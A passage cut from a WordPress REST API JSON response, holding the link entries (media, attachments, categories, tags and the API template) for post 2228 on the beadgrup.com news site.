-json\/wp\/v2\/media\/2232"}],"wp:attachment":[{"href":"https:\/\/beadgrup.com\/news\/wp-json\/wp\/v2\/media?parent=2228"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/beadgrup.com\/news\/wp-json\/wp\/v2\/categories?post=2228"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/beadgrup.com\/news\/wp-json\/wp\/v2\/tags?post=2228"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}